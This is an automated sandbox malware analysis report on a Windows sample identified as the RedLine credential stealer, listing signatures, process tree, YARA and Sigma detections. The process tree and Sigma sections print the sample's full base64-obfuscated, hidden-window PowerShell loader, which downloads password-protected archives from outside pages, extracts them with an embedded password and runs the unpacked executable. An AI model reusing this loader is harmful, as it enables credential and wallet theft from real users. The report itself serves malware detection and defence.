Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zkwindow.exe

Overview

General Information

Sample name:zkwindow.exe
Analysis ID:1634350
MD5:bd04d8b3cc0b6a257d2f73e726e7cbec
SHA1:a7d0cf73d777ed4e7b4c2ea074c3d0eb4601a85b
SHA256:1bf736bd8a06776dcb75a947d027e0ece226c52115a18e1c834bed393d9df53f
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected RedLine Stealer
Connects to many ports of the same IP (likely port scanning)
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • zkwindow.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\zkwindow.exe" MD5: BD04D8B3CC0B6A257D2F73E726E7CBEC)
    • powershell.exe (PID: 7820 cmdline: powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAZQB2AGUAbgBaAGkAcABVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnAA0ACgBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAkAHMAZQB2AGUAbgBaAGkAcABaAGkAcABQAGEAdABoACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgAkAHMAZQB2AGUAbgBaAGkAcABQAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABzAGUAdgBlAG4AWgBpAHAARQB4AHQAcgBhAGMAdABQAGEAdABoACAAIgA3AHoAYQAuAGUAeABlACIADQAKAA0ACgAkAHoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACgAWwBTAHkAcwB0AGUAbQAuAEcAdQBpAGQAXQA6ADoATgBlAHcARwB1AGkAZAAoACkALgBUAG8AUwB0AHIAaQBuAGcAKAAiAE4AIgApACkADQAKACQAegBpAHAAUABhAHMAcwB3AG8AcgBkACAAPQAgACIANQA0ADcAOABmAGgAagBkAEQAUwBIAEoASABEAFMASgBGAEgASgBTAEQAIwBAACQAQAAkACUAXgAjACQAJQBXAEQARgAhACIADQAKACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIAIAA9ACAAIgBfACIAIAArACAAKABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIATgAiACkAKQANAAoAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACQAcgBhAG4AZABvAG0ARgBvAGwAZABlAHIADQAKAA0ACgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJAB6AGkAcABQAGEAdABoACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAegBpAHAAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBlAHYAZQBuAFoAaQBwAFAAYQB0AGgAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAeAAiACwAIgBgACIAJAB6AGkAcABQAGEAdABoAGAAIgAiACwAIgAtAG8AYAAiACQAZQB4AHQAcgBhAGMAdABQAGEAdABoAGAAIgAiACwAIgAtAHAAJAB6AGkAcABQAGEAcwBzAHcAbwByAGQAIgAsACIALQB5ACIAIAAtAFcAYQBpAHQADQAKAHcAaABpAGwAZQAgACgALQBuAG8AdAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAApACkAIAB7AA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMADQAKAH0ADQAKAA0ACgAkAGUAeABlAEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQB4AHQAcgBhAGMAdABQAGEAdABoACAALQBGAGkAbAB0AGUAcgAgACIAKgAuAGUAeABlACIAIAAtAEYAaQBsAGUAIAAtAFIAZQBjAHUAcgBzAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAaQBmACAAKAAkAGUAeABlAEYAaQBsAGUAKQAgAHsADQAKACAAIAAgACAAVQBuAGIAbABvAGMAawAtAEYAaQBsAGUAIAAtAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUADQAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANwANAAoAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAeABlAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA0ACgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 7za.exe (PID: 7816 cmdline: "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y MD5: C58A4193BAC738B1A88ACAD9C6A57356)
        • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AUpdate.exe (PID: 7236 cmdline: "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" MD5: 9883F2B76A55BBA9AD696669845B7AEC)
        • cmd.exe (PID: 1464 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • MSBuild.exe (PID: 756 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • AUpdate.exe (PID: 5668 cmdline: "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" MD5: 9883F2B76A55BBA9AD696669845B7AEC)
    • cmd.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4224 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\vpdcuvmJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\vpdcuvmJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      C:\Users\user\AppData\Local\Temp\vpdcuvmMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
      • 0xb5026:$s14: keybd_event
      • 0xbbf88:$v1_1: grabber@
      • 0xb5be2:$v1_2: <BrowserProfile>k__
      • 0xb666f:$v1_3: <SystemHardwares>k__
      • 0xb672e:$v1_5: <ScannedWallets>k__
      • 0xb67be:$v1_6: <DicrFiles>k__
      • 0xb679a:$v1_7: <MessageClientFiles>k__
      • 0xb6b64:$v1_8: <ScanBrowsers>k__BackingField
      • 0xb6bb6:$v1_8: <ScanWallets>k__BackingField
      • 0xb6bd3:$v1_8: <ScanScreen>k__BackingField
      • 0xb6c0d:$v1_8: <ScanVPN>k__BackingField
      • 0xa8542:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
      • 0xa7e4e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
      C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 8 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    20.2.MSBuild.exe.1000000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      20.2.MSBuild.exe.1000000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        20.2.MSBuild.exe.1000000.0.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                        • 0xb5026:$s14: keybd_event
                        • 0xbbf88:$v1_1: grabber@
                        • 0xb5be2:$v1_2: <BrowserProfile>k__
                        • 0xb666f:$v1_3: <SystemHardwares>k__
                        • 0xb672e:$v1_5: <ScannedWallets>k__
                        • 0xb67be:$v1_6: <DicrFiles>k__
                        • 0xb679a:$v1_7: <MessageClientFiles>k__
                        • 0xb6b64:$v1_8: <ScanBrowsers>k__BackingField
                        • 0xb6bb6:$v1_8: <ScanWallets>k__BackingField
                        • 0xb6bd3:$v1_8: <ScanScreen>k__BackingField
                        • 0xb6c0d:$v1_8: <ScanVPN>k__BackingField
                        • 0xa8542:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                        • 0xa7e4e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                        16.2.cmd.exe.2da00c8.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          16.2.cmd.exe.2da00c8.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            Click to see the 10 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: PowerShell Base64 Encoded Invoke Keyword
                            Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAA
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBl